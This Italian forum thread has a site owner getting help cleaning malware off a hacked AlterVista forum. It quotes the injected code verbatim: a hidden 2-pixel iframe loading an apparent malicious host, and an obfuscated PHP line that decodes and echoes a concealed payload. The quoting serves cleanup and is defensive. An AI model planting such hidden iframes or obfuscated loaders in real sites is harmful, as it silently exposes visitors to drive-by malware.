Malware inspiegabili nel mio sito

Salve, non so se ho indovinato la sezione dove postare.

Da qualche il giorno il forum del mio sito ha cominciato a dare problemi inspiegabilmente, in poche ore il sito si è rivelato irragiungibile, perchè google mi dice che contiene malware e anche l'antivirus me lo segnala come sito cattivo.

non riesco a spiegarmi il motivo di tutto ciò all'improvviso

so solo che google mi dice questo:

http://safebrowsing.clients.google.c...sta.org/forum/

qualcuno sa aiutarmi ?

[karl94]

Cerca ed elimina il seguente codice

Codice HTML:

<iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'></iframe><iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'></iframe>

Dopodiché cambia le credenziali di accesso relative al tuo account AlterVista ed effettua inoltra una scansione accurata del tuo computer per rivelare eventuali malware.

gentilissimo, ma questo frammento di codice dove devo cercarlo?

[karl94]

Nel file index.php e tutti gli altri da esso richiamati.

nell'index non c'è niente di simile al tuo codice : (

edit: l'ho trovato nellì'index_body.html

[karl94]

Bene, ora ricordati di effettuare l'altro passaggio:

Dopodiché cambia le credenziali di accesso relative al tuo account AlterVista ed effettua inoltra una scansione accurata del tuo computer per rivelare eventuali malware.

l'ho trovato su varie index presenti nel forum, e rimosso da tutti.

ho cambiato la psw d'accesso ad av

la scansione del pc l'ho fatta alcuni giorni fa e ha rimosso un pò di roba, ma comunque a giorni formatto.

come faccio a sapere se ho risolto visto che google mi da ancora il sito come pericoloso:
http://www.beateaters.altervista.org/forum/

[karl94]

Trovi le informazioni all'indirizzo http://safebrowsing.clients.google.c...ltervista.org/, leggi l'ultimo punto, che spiega le azioni da intraprendere se si è il proprietario del sito.

ti ringrazio, vedo che riesco a fare. : )

EDIT: so facendo controllare il sito da google, tramite gli strumenti per webmaster, se tutto va bene , dopo aver rimosso il codice, il sito (forum) dovrebbe tornare visibile.

grazie, vi aggiorno

purtroppo mi sono accorto che il codice malevolo in questione è in quasi tutte le pagine del forum e non solo nell'index.php ergo ... sto passando ore ed ore ad analizzare tutte le pagine e rimuovere decine e decine di volte il maledetto codice..

PS: è normale che molte index siano completamente vuote ?

EDIT: in molte pagine incontro anche quest stringa:


<?php $somecrainsignvar="45vg9e8c"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Y l9cozEioJI0LKA0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUE bCFplWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjWm48Y2yzp zSgMG4=')); $crain="";

potrebbe essere anch'essa una stringa malevola ?

[karl94]

Suppongo che in questi casi sia più semplice sostituire tutti i files dell'applicativo con gli originali, ma non so darti maggiori dettagli in merito, non sono esperto in questo campo.

si, sarebbe la cosa più logica e veloce, però purtroppo il forum presenta numerose MOD tutte istallate a regola d'arte.

ergo ci sarebbe da rifare un lavoro grandissimo che è durato 2 anni !!!

intanto continuo a rimuovere...

riguardo quella stringa invece ?

[karl94]

Sì, anche quel codice non dovrebbe esserci. Puoi scrivere l'intero codice? Quella è solo una parte.
Ricorda di includerlo tra i tag [php] e [/php] quando lo scrivi qui sul forum.

Comunque un modo più veloce è: scaricare l'intero sito in locale e usare un editor che permetta di sostituire una stringa su più files per rimuovere il codice incriminato, dopodiché ricaricare il tutto.

ecco la stringa:

Codice PHP:

<?php $somecrainsignvar="yrzan81e"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Yl9cozEioJI0LKA0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUEbCFplWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjWm48Y2yzpzSgMG4=')); $crain="";

uso notepad++ lo conosci di sicuro? qual'è il modo per cancellare su più files ste maledette stringhe malevole ?

grazie dell 'aiuto :(

[karl94]

ecco la stringa:

Codice PHP:

<?php $somecrainsignvar="yrzan81e"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Yl9cozEioJI0LKA0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUEbCFplWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjWm48Y2yzpzSgMG4=')); $crain="";

Puoi scrivere l'intero codice? Quella è solo una parte.

Per quanto riguarda Notepad++ mi pare di ricordare ci fosse la funzione Trova su files.

ho scritto l'intero codice... è quella la stringa

se intendi l'intero codice della pagina non ha senso. perchè questa stringa c'è in molte pagine ... perderei qualche mesetto a metterle qui